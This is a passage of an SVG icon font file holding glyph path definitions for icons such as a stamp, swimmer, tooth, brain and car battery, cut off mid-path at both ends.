h-256c-17.6699 0 -32 14.3301 -32 32v224c0 53.0195 42.9805 96 96 96h128zM160 32c44.1797 0 80 35.8203 80 80s-35.8203 80 -80 80s-80 -35.8203 -80 -80s35.8203 -80 80 -80zM480 352c-17.6699 0 -32 14.3301 -32 32s14.3301 32 32 32s32 -14.3301 32 -32
s-14.3301 -32 -32 -32zM384 320c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32zM288 416c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32zM384 416c17.6699 0 32 -14.3301 32 -32
s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32zM480 224c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32z" />
    <glyph glyph-name="stamp" unicode="&#xf5bf;" 
d="M32 -64v64h448v-64h-448zM416 192c53.0195 0 96 -42.9805 96 -96v-32c0 -17.6699 -14.3301 -32 -32 -32h-448c-17.6699 0 -32 14.3301 -32 32v32c0 53.0195 42.9805 96 96 96h66.5596c16.2607 0 29.4404 13.1797 29.4404 29.4404v0.0693359
c0 31.79 -9.98047 62.0605 -23.3096 90.9102c-5.57031 12.04 -8.69043 25.4199 -8.69043 39.5801c0 58.6699 52.6201 105.04 113.25 94.4902c38.79 -6.75 70.4902 -38.6699 77.2598 -77.4502c3.85059 -22.0303 0.0605469 -42.8096 -9.0498 -60.4199
c-12.5801 -24.3105 -21.46 -50.3506 -21.46 -77.7197v-9.45996c0 -16.2607 13.1797 -29.4404 29.4404 -29.4404h66.5596z" />
    <glyph glyph-name="star-half-alt" unicode="&#xf5c0;" horiz-adv-x="536" 
d="M508.55 276.49c26.25 -3.7998 36.7705 -36.1006 17.7305 -54.6006l-105.91 -102.979l25.0303 -145.49c3.55957 -20.79 -13.0605 -37.4004 -31.6602 -37.4004c-4.91016 0 -9.9707 1.16016 -14.8301 3.71094l-130.94 68.6992l-130.95 -68.6797
c-4.86914 -2.58008 -9.93945 -3.75 -14.8691 -3.75c-18.5801 0 -35.1699 16.6699 -31.6104 37.4502l25.0596 145.479l-105.89 103c-19.0303 18.5 -8.50977 50.79 17.7402 54.5898l146.38 21.29l65.4297 132.381c5.90039 11.9092 17.29 17.8096 28.6904 17.8096
c11.4697 0 22.9395 -5.98047 28.8193 -17.8096l65.4102 -132.391zM386.81 153.29l82.6504 80.3799l-114.229 16.6299l-25.0107 3.64062l-11.1797 22.6299l-51.0303 103.29l-0.0292969 -317.19l22.3799 -11.7402l102.13 -53.5898l-19.5205 113.45l-4.2793 24.8799z" />
    <glyph glyph-name="suitcase-rolling" unicode="&#xf5c1;" horiz-adv-x="384" 
d="M336 288c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-16v-16c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v16h-128v-16c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v16h-16
c-26.5098 0 -48 21.4902 -48 48v224c0 26.5098 21.4902 48 48 48h288zM320 72v16c0 4.41992 -3.58008 8 -8 8h-240c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h240c4.41992 0 8 3.58008 8 8zM320 168v16c0 4.41992 -3.58008 8 -8 8h-240
c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h240c4.41992 0 8 3.58008 8 8zM144 400v-80h-48v80c0 26.5098 21.4902 48 48 48h96c26.5098 0 48 -21.4902 48 -48v-80h-48v80h-96z" />
    <glyph glyph-name="surprise" unicode="&#xf5c2;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM136 240c0 -17.7002 14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32zM248 32c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64
s-64 -28.7002 -64 -64s28.7002 -64 64 -64zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="swatchbook" unicode="&#xf5c3;" horiz-adv-x="511" 
d="M479.06 128c17.6406 0 31.9404 -14.3301 31.9404 -32v-128c0 -17.6699 -14.2998 -32 -31.9404 -32h-299.579c2.17969 1.91016 4.60938 3.41992 6.66992 5.49023l186.14 186.51h106.77zM434.56 280.9c12.4707 -12.4902 12.4707 -32.7607 0 -45.2607l-211.869 -212.279
c0.199219 2.90918 0.869141 5.67969 0.869141 8.63965v263.76l75.5 75.6504c12.4805 12.5 32.7002 12.5 45.1709 0zM191.62 416v-384c0 -53.0195 -42.9004 -96 -95.8105 -96c-52.9092 0 -95.8096 42.9805 -95.8096 96v384c0 17.6699 14.2998 32 31.9404 32h127.739
c17.6406 0 31.9404 -14.3301 31.9404 -32zM95.8096 8c13.2305 0 23.96 10.75 23.9502 24c0 13.2598 -10.7295 24 -23.9502 24c-13.2197 0 -23.9492 -10.7402 -23.9492 -24c0 -13.25 10.7197 -24 23.9492 -24zM127.75 192l0.00976562 64h-63.8799v-64h63.8701zM127.75 320
l0.00976562 64h-63.8799v-64h63.8701z" />
    <glyph glyph-name="swimmer" unicode="&#xf5c4;" horiz-adv-x="640" 
d="M189.61 137.42c-5.04004 4.65039 -10.3906 8.34961 -15.8604 11.5801l68.6299 98.04c7.36035 10.5 16.3398 19.5498 26.7197 26.9404l80.0205 57.1699c25.54 18.2598 57.8301 24.96 88.5596 18.3799l100.351 -21.5303c25.9297 -5.55957 42.4297 -31.0801 36.8799 -57
c-5.56055 -25.9102 -31.0898 -42.4102 -57 -36.8799l-100.351 21.5303c-4.33984 0.90918 -8.97949 -0.0302734 -12.6191 -2.61035l-18 -12.8604l112.84 -80.5996c-17.5107 -1.04004 -34.5303 -8.4502 -49.3906 -22.1602
c-3.5293 -3.25977 -15.2695 -9.41992 -34.3896 -9.41992s-30.8496 6.16016 -34.3896 9.41992c-16.0107 14.7705 -34.5 22.5801 -53.46 22.5801h-16.3008c-18.96 0 -37.4395 -7.80957 -53.46 -22.5801c-3.5293 -3.25977 -15.2695 -9.41992 -34.3896 -9.41992
s-30.8496 6.16016 -34.3896 9.41992zM624 96c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-16c-38.6201 0 -72.7197 12.1797 -96 31.8398c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398s-72.7197 12.1797 -96 31.8398
c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398s-72.7197 12.1797 -96 31.8398c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398h-16c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h16c26.04 0 45.7998 8.41992 56.0703 17.9004
c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998c12.1104 0 22.8701 -5.88965 31.7705 -14.0996c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004s45.7998 8.41992 56.0703 17.9004c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998
c12.1104 0 22.8701 -5.88965 31.7705 -14.0996c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004s45.7998 8.41992 56.0703 17.9004c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998c12.1104 0 22.8701 -5.88965 31.7705 -14.0996
c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004h16zM112 192c-44.1797 0 -80 35.8203 -80 80s35.8203 80 80 80s80 -35.8203 80 -80s-35.8203 -80 -80 -80z" />
    <glyph glyph-name="swimming-pool" unicode="&#xf5c5;" horiz-adv-x="640" 
d="M624 32c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-16c-38.6201 0 -72.7197 12.1797 -96 31.8398c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398s-72.7197 12.1797 -96 31.8398c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398
s-72.7197 12.1797 -96 31.8398c-23.2803 -19.6494 -57.3799 -31.8398 -96 -31.8398h-16c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h16c26.04 0 45.7998 8.41992 56.0703 17.9004c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998
c12.1104 0 22.8701 -5.88965 31.7705 -14.0996c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004s45.7998 8.41992 56.0703 17.9004c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998c12.1104 0 22.8701 -5.88965 31.7705 -14.0996
c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004s45.7998 8.41992 56.0703 17.9004c8.89941 8.20996 19.6602 14.0996 31.7695 14.0996h16.2998c12.1104 0 22.8701 -5.88965 31.7705 -14.0996c10.29 -9.48047 30.0498 -17.9004 56.0898 -17.9004h16zM224 64
c-19.1201 0 -30.8604 6.16016 -34.3896 9.42969c-9.16992 8.4502 -19.2002 14.3398 -29.6104 18.0703v228.5c0 52.9404 43.0596 96 96 96s96 -43.0596 96 -96v-16c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v16c0 17.6396 -14.3604 32 -32 32
s-32 -14.3604 -32 -32v-96h192v96c0 52.9404 43.0596 96 96 96s96 -43.0596 96 -96v-16c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v16c0 17.6396 -14.3604 32 -32 32s-32 -14.3604 -32 -32v-228.51
c-10.4102 -3.73047 -20.4404 -9.61035 -29.6104 -18.0703c-3.5293 -3.25977 -15.2695 -9.41992 -34.3896 -9.41992v96h-192v-96z" />
    <glyph glyph-name="tint-slash" unicode="&#xf5c7;" horiz-adv-x="640" 
d="M633.82 -10.0996c6.97949 -5.43066 8.22949 -15.4805 2.81934 -22.4502l-19.6396 -25.2705c-5.42969 -6.97949 -15.4805 -8.23926 -22.46 -2.80957l-588.36 454.729c-6.97949 5.43066 -8.22949 15.4805 -2.80957 22.4502l19.6396 25.2705
c5.41992 6.97949 15.4805 8.22949 22.46 2.80957l186.82 -144.399c21.6201 33.7197 42.9697 73.3398 58.4902 125.68c9 30.1201 50.5 28.7803 58.4395 0c46.9902 -158.48 146.78 -200.061 146.78 -311.82c0 -5.70996 -0.509766 -11.2998 -1.03027 -16.8701zM144 114.09
c0 29.7803 7.30957 54.6299 18.7197 78.1299l273.681 -211.52c-31.0303 -27.7402 -71.6904 -44.7002 -116.4 -44.7002c-97.2803 0 -176 79.6504 -176 178.09z" />
    <glyph glyph-name="tired" unicode="&#xf5c8;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM281.8 250.3c-7.7002 -4.7002 -7.7002 -15.8994 0 -20.5996l80 -48c11.5 -6.7998 24.1006 7.59961 15.4004 18l-33.6006 40.2998l33.6006 40.2998
c8.59961 10.2998 -3.7998 24.9004 -15.4004 18zM118.8 280.3l33.6006 -40.2998l-33.6006 -40.2998c-8.59961 -10.4004 3.90039 -24.7998 15.4004 -18l80 48c7.7998 4.7002 7.7998 15.8994 0 20.5996l-80 48c-11.6006 6.90039 -24 -7.7002 -15.4004 -18zM248 160
c-51.9004 0 -115.3 -43.7998 -123.2 -106.7c-1.7002 -13.3994 7.90039 -24.5996 17.7002 -20.3994c25.9004 11.0996 64.4004 17.3994 105.5 17.3994s79.5996 -6.2998 105.5 -17.3994c9.7002 -4.2002 19.4004 6.7998 17.7002 20.3994
c-7.90039 62.9004 -71.2998 106.7 -123.2 106.7z" />
    <glyph glyph-name="tooth" unicode="&#xf5c9;" horiz-adv-x="448" 
d="M443.98 351.75c10.1299 -41.6299 0.419922 -80.8203 -21.5303 -110.43c-23.3604 -31.5703 -32.6807 -68.6504 -36.29 -107.351c-4.41016 -47.1602 -10.3301 -94.1699 -20.9404 -140.319l-7.7998 -33.9502c-3.18945 -13.8701 -15.4902 -23.7002 -29.6699 -23.7002
c-13.9697 0 -26.1504 9.5498 -29.54 23.1602l-34.4697 138.42c-4.56055 18.3096 -20.96 31.1602 -39.7598 31.1602c-18.8008 0 -35.2002 -12.8398 -39.7607 -31.1602l-34.4697 -138.42c-3.38965 -13.6104 -15.5703 -23.1602 -29.54 -23.1602
c-14.1797 0 -26.4795 9.83008 -29.6699 23.7002l-7.7998 33.9502c-10.6104 46.1592 -16.54 93.1592 -20.9404 140.319c-3.60938 38.6904 -12.9297 75.7803 -36.29 107.351c-21.9199 29.6201 -31.6299 68.8096 -21.5 110.43c11.0098 45.2197 47.1104 82.0498 92.0098 93.7197
c23.4307 6.08984 46.1104 0.540039 66.8105 -10.3096l100.51 -64.6201c7.83984 -5.05957 17.6504 -2.15039 22.1104 4.7998c4.78027 7.44043 2.62012 17.3398 -4.7998 22.1104l-28.3203 18.21c3.54004 1.75 7.25 3.08984 10.5 5.47949
c26.1396 19.2305 56.9502 32.6904 89.1396 24.3301c44.9004 -11.6602 81 -48.5 92.0107 -93.7197z" />
    <glyph glyph-name="umbrella-beach" unicode="&#xf5ca;" horiz-adv-x="640" 
d="M115.38 311.1c-10.0801 3.66992 -14.1104 16.3203 -7.41992 24.7207c59.75 74.8398 152.65 116.689 248.53 111.8c-52.79 -29.4102 -103.811 -92.1602 -139 -173.7zM247.63 262.94c44.4902 101.979 114.74 171.14 172.76 171.149c7.95996 0 15.6904 -1.2998 23.0908 -4
c61.3291 -22.3203 78.3896 -132.6 42.6299 -253.979zM521.48 387.5c76.5293 -57.9199 120.76 -149.67 118.439 -245.36c-0.259766 -10.7393 -11.4795 -17.8398 -21.5703 -14.1699l-102.619 37.3604c17.5293 58.75 24.6895 117.09 18.9492 166.979
c-2.37012 20.5908 -6.97949 38.8906 -13.1992 55.1904zM560 0.0195312c8.83984 0 16 -7.15918 16 -16v-32.0098c0 -8.83984 -7.16016 -16.0098 -16 -16.0098h-544c-8.83984 0 -16 7.16992 -16 16.0098v32.0098c0 8.85059 7.16016 16.0107 16 16.0107h236.96l72.9004 200.37
l60.1396 -21.9004l-64.9404 -178.48h238.94z" />
    <glyph glyph-name="vector-square" unicode="&#xf5cb;" 
d="M512 320c0 -17.6699 -14.3301 -32 -32 -32v-192c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32h-192c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32v192
c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96c17.6699 0 32 -14.3301 32 -32h192c0 17.6699 14.3301 32 32 32h96c17.6699 0 32 -14.3301 32 -32v-96zM416 384v-32h32v32h-32zM64 384v-32h32v32h-32zM96 0v32h-32v-32h32zM448 0v32h-32v-32h32zM416 96
v192h-32c-17.6699 0 -32 14.3301 -32 32v32h-192v-32c0 -17.6699 -14.3301 -32 -32 -32h-32v-192h32c17.6699 0 32 -14.3301 32 -32v-32h192v32c0 17.6699 14.3301 32 32 32h32z" />
    <glyph glyph-name="weight-hanging" unicode="&#xf5cd;" 
d="M510.28 2.13965c8.33008 -33.3096 -14.6602 -66.1396 -46.2998 -66.1396h-415.95c-31.6504 0 -54.6406 32.8301 -46.3105 66.1396l73.0498 292.13c3.79004 15.1807 16.4404 25.7207 30.8701 25.7207h60.25c-3.58008 10.0498 -5.87988 20.7197 -5.87988 32
c0 53.0195 42.9805 96 96 96c53.0205 0 96 -42.9805 96 -96c0 -11.2803 -2.30957 -21.9502 -5.87988 -32h60.25c14.4297 0 27.0703 -10.5303 30.8701 -25.7207zM256 320c17.6396 0 32 14.3604 32 32s-14.3604 32 -32 32s-32 -14.3604 -32 -32s14.3604 -32 32 -32z" />
    <glyph glyph-name="wine-glass-alt" unicode="&#xf5ce;" horiz-adv-x="288" 
d="M216 -16c22.0898 0 40 -17.9102 40 -40c0 -4.41992 -3.58008 -8 -8 -8h-208c-4.41992 0 -8 3.58008 -8 8c0 22.0898 17.9102 40 40 40h40v117.18c-68.4697 15.8906 -118.05 79.9102 -111.4 154.16l15.96 178.11c0.730469 8.24023 7.55078 14.5498 15.7002 14.5498h223.48
c8.16016 0 14.9697 -6.30957 15.71 -14.5498l15.9502 -178.101c6.64941 -74.25 -42.9307 -138.27 -111.4 -154.159v-117.19h40zM61.75 400l-7.16992 -80h178.84l-7.16992 80h-164.5z" />
    <glyph glyph-name="air-freshener" unicode="&#xf5d0;" horiz-adv-x="384" 
d="M378.94 126.59c11.75 -12.1494 1.71973 -30.5898 -16.6406 -30.5898h-138.3v-32h112c8.83984 0 16 -7.16016 16 -16v-96c0 -8.83984 -7.16016 -16 -16 -16h-288c-8.83984 0 -16 7.16016 -16 16v96c0 8.83984 7.16016 16 16 16h112v32h-138.3
c-18.3604 0 -28.3906 18.4404 -16.6406 30.5898l94.2402 97.4102h-49.2197c-15.2998 0 -23.6602 16.5996 -13.8604 27.5303l113.33 126.51c-3.42969 6.61035 -5.5498 14 -5.5498 21.96c0 26.5098 21.4902 48 48 48s48 -21.4902 48 -48
c0 -7.95996 -2.12012 -15.3496 -5.5498 -21.96l113.33 -126.51c9.7998 -10.9307 1.43945 -27.5303 -13.8604 -27.5303h-49.2197zM192 416.02c-8.84961 0 -16.0195 -7.16992 -16.0195 -16.0195c0 -8.83984 7.16992 -16.0195 16.0195 -16.0195
s16.0195 7.17969 16.0195 16.0195c0 8.84961 -7.16992 16.0195 -16.0195 16.0195zM304 16h-224v-32h224v32z" />
    <glyph glyph-name="apple-alt" unicode="&#xf5d1;" horiz-adv-x="448" 
d="M350.85 319c25.9707 -4.66992 47.2705 -18.6699 63.9199 -42c14.6504 -20.6699 24.6406 -46.6699 29.9609 -78c4.66992 -28.6699 4.31934 -57.3301 -1 -86c-7.99023 -47.3301 -23.9707 -87 -47.9404 -119c-28.6396 -38.6699 -64.5898 -58 -107.87 -58
c-10.6602 0 -22.2998 3.33008 -34.96 10c-8.66016 5.33008 -18.3096 8 -28.9697 8s-20.2998 -2.66992 -28.9707 -8c-12.6592 -6.66992 -24.2998 -10 -34.96 -10c-43.2793 0 -79.2295 19.3301 -107.869 58c-23.9707 32 -39.9502 71.6699 -47.9404 119
c-5.32031 28.6699 -5.66992 57.3301 -1 86c5.32031 31.3301 15.3096 57.3301 29.96 78c16.6504 23.3301 37.9502 37.3301 63.9199 42c15.9805 2.66992 37.9502 0.330078 65.9199 -7c23.9697 -6.66992 44.2803 -14.6699 60.9307 -24
c16.6494 9.33008 36.96 17.3301 60.9297 24c27.9795 7.33008 49.96 9.66992 65.9395 7zM295.91 360c-9.32031 -8.66992 -21.6504 -15 -36.96 -19c-10.6602 -3.33008 -22.2998 -5 -34.96 -5l-14.9805 1c-1.33008 9.33008 -1.33008 20 0 32
c2.66992 24 10.3203 42.3301 22.9707 55c9.31934 8.66992 21.6494 15 36.96 19c10.6592 3.33008 22.2998 5 34.96 5l14.9795 -1l1 -15c0 -12.6699 -1.66992 -24.3301 -4.99023 -35c-3.98926 -15.3301 -10.3096 -27.6699 -18.9795 -37z" />
    <glyph glyph-name="atom" unicode="&#xf5d2;" horiz-adv-x="448" 
d="M413.03 192c40.1396 -54.9102 41.5195 -98.5996 25.1396 -128c-29.2197 -52.3398 -101.689 -43.5801 -116.33 -41.8799c-21.4697 -51.2197 -54.2002 -86.1201 -97.8398 -86.1201s-76.3701 34.9004 -97.8398 86.1201c-14.6504 -1.7002 -87.1201 -10.46 -116.33 41.8799
c-16.3701 29.3799 -14.9902 73.1104 25.1396 128c-40.1396 54.9102 -41.5195 98.5996 -25.1396 128c10.9004 19.5195 40.5996 50.6602 116.33 41.8799c21.4795 51.2305 54.2002 86.1201 97.8398 86.1201s76.3604 -34.8896 97.8398 -86.1201
c75.79 8.85059 105.42 -22.3604 116.33 -41.8799c16.3701 -29.3799 14.9902 -73.1104 -25.1396 -128zM63.3799 96c3.69043 -6.59961 19.0205 -11.8604 43.5801 -10.9697c-2.75977 13 -5.0498 26.3701 -6.75977 40.0801c-7.66992 6.29004 -14.9102 12.6494 -21.8701 19.1797
c-15.1396 -23.4902 -18.9805 -41.0801 -14.9502 -48.29zM100.2 258.88c1.39355 11.1816 4.43555 29.2002 6.79004 40.2197c-1.82031 0.0703125 -3.98047 0.370117 -5.69043 0.370117c-21.5303 0 -34.5098 -5.33008 -37.9199 -11.4697
c-4.01953 -7.20996 -0.179688 -24.7998 14.9502 -48.2998c6.96973 6.53027 14.21 12.8896 21.8701 19.1797zM224 384c-9.46973 0 -22.2002 -13.5195 -33.8604 -37.2598c11.1904 -3.7002 22.4404 -8 33.8604 -12.8604c11.4199 4.86035 22.6699 9.16016 33.8604 12.8604
c-11.6602 23.7402 -24.3906 37.2598 -33.8604 37.2598zM224 0c9.46973 0 22.2002 13.5195 33.8604 37.2598c-11.1904 3.7002 -22.4404 8 -33.8604 12.8604c-11.4199 -4.86035 -22.6699 -9.16016 -33.8604 -12.8604c11.6602 -23.7402 24.3906 -37.2598 33.8604 -37.2598z
M286.5 157.33c1.99023 27.7998 1.98047 41.5498 0 69.3301c-26.6396 19.04 -46.1104 29.3096 -62.5 37.4795c-16.3701 -8.15918 -35.8301 -18.4297 -62.5 -37.4795c-1.99023 -27.79 -1.99023 -41.54 0 -69.3301c26.7002 -19.0703 46.1504 -29.3398 62.5 -37.4805
c16.3604 8.15039 35.7998 18.4004 62.5 37.4805zM384.62 96c4.01953 7.20996 0.179688 24.7998 -14.9502 48.29c-6.96973 -6.53027 -14.21 -12.8896 -21.8701 -19.1797c-1.70996 -13.6904 -4 -27.0605 -6.75977 -40.0605c24.5801 -0.870117 39.9102 4.33008 43.5801 10.9502
zM369.67 239.71c15.1299 23.4902 18.9697 41.0801 14.9502 48.2998c-3.41016 6.12988 -16.4004 11.4707 -37.9199 11.4707c-1.71973 0 -3.87012 -0.300781 -5.69043 -0.370117c2.35254 -11.0205 5.39453 -29.0391 6.79004 -40.2207
c7.66992 -6.29004 14.9102 -12.6494 21.8701 -19.1797zM224 224c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32z" />
    <glyph glyph-name="bone" unicode="&#xf5d7;" horiz-adv-x="640" 
d="M598.88 203.44c-9.42969 -4.70996 -9.42969 -18.1709 -0.00976562 -22.8809c25.2002 -12.5996 41.1201 -38.3496 41.1201 -66.5293v-7.64062c0 -41.0898 -33.2998 -74.3896 -74.3799 -74.3896c-32.0107 0 -60.4404 20.4902 -70.5703 50.8604
c-6.53027 19.5996 -10.7305 45.1396 -38.1104 45.1396h-273.87c-26.5098 0 -30.4297 -22.1104 -38.1094 -45.1396c-10.1299 -30.3701 -38.5498 -50.8604 -70.5703 -50.8604c-41.0801 0 -74.3799 33.2998 -74.3799 74.3896v7.64062
c0 28.1699 15.9199 53.9297 41.1201 66.5293c9.42969 4.70996 9.42969 18.1709 0 22.8809c-25.2002 12.5996 -41.1201 38.3594 -41.1201 66.5293v7.64062c0 41.0898 33.2998 74.3896 74.3896 74.3896c32.0107 0 60.4404 -20.4902 70.5605 -50.8604
c6.53027 -19.5996 10.7295 -45.1396 38.1094 -45.1396h273.87c26.5107 0 30.4307 22.1104 38.1104 45.1396c10.1299 30.3701 38.5498 50.8604 70.5703 50.8604c41.0898 0 74.3896 -33.2998 74.3896 -74.3896v-7.64062c0 -28.1699 -15.9199 -53.9297 -41.1201 -66.5293z" />
    <glyph glyph-name="book-reader" unicode="&#xf5da;" 
d="M352 352c0 -53.0195 -42.9805 -96 -96 -96s-96 42.9805 -96 96s42.9805 96 96 96s96 -42.9805 96 -96zM233.59 206.9c4.10059 -2.51074 6.41016 -6.79004 6.41992 -11.46v-245.99c0 -10.1602 -11.1094 -16.5898 -20.4795 -11.8701
c-61.0498 30.75 -149.38 39.1396 -193.04 41.4297c-14.9004 0.770508 -26.4902 12.7207 -26.4902 27.0498v222.801c0 15.6299 13.5498 28.0098 29.7998 27.0898c48.3604 -2.75 144.46 -12.7305 203.79 -49.0498zM482.2 255.95
c16.25 0.919922 29.7998 -11.46 29.8096 -27.0898v-222.82c0 -14.3301 -11.5898 -26.2803 -26.4902 -27.0596c-43.6494 -2.29004 -131.93 -10.6807 -192.97 -41.4004c-9.39941 -4.73047 -20.54 1.70996 -20.54 11.9004v245.789c0 4.6709 2.31055 9.12012 6.41016 11.6309
c59.3203 36.3193 155.43 46.3096 203.78 49.0498z" />
    <glyph glyph-name="brain" unicode="&#xf5dc;" horiz-adv-x="576" 
d="M208 448c35.3398 0 64 -28.6504 64 -64v-74.0703c0 -26.0898 -18 -47.8799 -42.2002 -54.04c-3.4502 -0.879883 -5.7998 -4.08984 -5.7998 -7.65918v-16.1807c0 -5.06934 4.66992 -8.91016 9.63965 -7.88965c14.3799 2.93945 27.4502 9.41016 38.3604 18.3896v-234.55
c0 -39.7598 -32.2305 -72 -72 -72c-31.75 0 -58.3896 20.6904 -67.9697 49.21c-3.93066 -0.660156 -7.91016 -1.20996 -12.0303 -1.20996c-39.7695 0 -72 32.2402 -72 72c0 4.83008 0.519531 9.54004 1.41992 14.1104c-29 12.0098 -49.4199 40.5498 -49.4199 73.8896
c0 29.6699 16.3398 55.2803 40.3398 69.0898c-5.17969 10.5898 -8.33984 22.3301 -8.33984 34.9102c0 33.4297 20.54 62 49.6602 73.96c-1.02051 4.53027 -1.66016 9.2002 -1.66016 14.04c0 35.3496 28.6602 64 64 64c0.75 0 1.4502 -0.200195 2.2002 -0.219727
c7.05957 27.6699 31.9297 48.2197 61.7998 48.2197zM576 144c0 -33.3398 -20.4199 -61.8799 -49.4199 -73.8896c0.900391 -4.57031 1.41992 -9.28027 1.41992 -14.1104c0 -39.7598 -32.2305 -72 -72 -72c-4.12012 0 -8.09961 0.540039 -12.0303 1.20996
c-9.58008 -28.5195 -36.2197 -49.21 -67.9697 -49.21c-39.7695 0 -72 32.2402 -72 72v234.55c10.9199 -8.97949 23.9805 -15.4502 38.3604 -18.3896c4.95996 -1.02051 9.63965 2.82031 9.63965 7.88965v16.1807c0 3.56934 -2.33984 6.7793 -5.7998 7.65918
c-24.21 6.16016 -42.2002 27.9502 -42.2002 54.04v74.0703c0 35.3496 28.6602 64 64 64c29.8701 0 54.7402 -20.5498 61.7998 -48.2197c0.75 0.0195312 1.4502 0.219727 2.2002 0.219727c35.3398 0 64 -28.6504 64 -64c0 -4.83984 -0.639648 -9.50977 -1.66016 -14.04
c29.1201 -11.96 49.6602 -40.5303 49.6602 -73.96c0 -12.5801 -3.16992 -24.3203 -8.33984 -34.9102c24 -13.8096 40.3398 -39.4199 40.3398 -69.0898z" />
    <glyph glyph-name="car-alt" unicode="&#xf5de;" horiz-adv-x="480" 
d="M438.66 235.67c24.1201 -9.16992 41.3398 -32.3301 41.3398 -59.6699v-48c0 -16.1299 -6.16016 -30.6797 -16 -41.9297v-54.0703c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v32h-256v-32c0 -17.6699 -14.3301 -32 -32 -32h-32
c-17.6699 0 -32 14.3301 -32 32v54.0703c-9.83984 11.2598 -16 25.8096 -16 41.9297v48c0 27.3398 17.2197 50.5 41.3398 59.6699l11.2402 28.0996l19.9297 49.8301c17.1104 42.7705 57.9307 70.4004 103.99 70.4004h127c46.0703 0 86.8799 -27.6299 103.99 -70.4004
l19.9297 -49.8301zM131.93 289.83l-19.9297 -49.8301h256l-19.9297 49.8301c-7.29004 18.2197 -24.9404 30.1699 -44.5703 30.1699h-127c-19.6299 0 -37.2803 -11.9502 -44.5703 -30.1699zM80 128.2c19.2002 0 48 -3.19043 48 15.9502
c0 19.1396 -28.7998 47.8496 -48 47.8496s-32 -12.7598 -32 -31.9004c0 -19.1396 12.7998 -31.8994 32 -31.8994zM400 128.2c19.2002 0 32 12.7598 32 31.8994c0 19.1406 -12.7998 31.9004 -32 31.9004s-48 -28.71 -48 -47.8496c0 -19.1406 28.7998 -15.9502 48 -15.9502z
" />
    <glyph glyph-name="car-battery" unicode="&#xf5df;" 
d="M480 320c17.6699 0 32 -14.3301 32 -32v-256c0 -17.6699 -14.3301 -32 -32 -32h-448c-17.6699 0 -32 14.3301 -32 32v256c0 17.6699 14.3301 32 32 32h32v48c0 8.83984 7.16016 16 16 16h96c8.83984 0 16 -7.16016 16 -16v-48h128v48c0 8.83984 7.16016 16 16 16h96
c8.83984 0 16 -7.16016 16 -16v-48h32zM192 184v16c0 4.41992 -3.58008 8 -8 8h-112c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h112c4.41992 0 8 3.58008 8 8zM448 184v16c0 4.41992 -3.58008 8 -8 8h-40v40c0 4.41992 -3.58008 8 -8 8h-16
c-4.41992 0 -8 -3.58008 -8 -8v-40h-40c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h40v-40c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v40h40c4.41992 0 8 3.58008 8 8z" />
    <glyph glyph-name="car-crash" unicode="&#xf5e1;" horiz-adv-x="640" 
d="M143.25 227.19l-12.4199 -46.3701c-3.00977 -11.25 -3.62988 -22.8906 -2.41016 -34.3906l-35.2002 -28.9795c-6.56934 -5.41016 -16.3096 0.429688 -14.6201 8.76953l15.4404 76.6807c1.05957 5.25977 -2.66016 10.2793 -8 10.79l-77.8604 7.5498
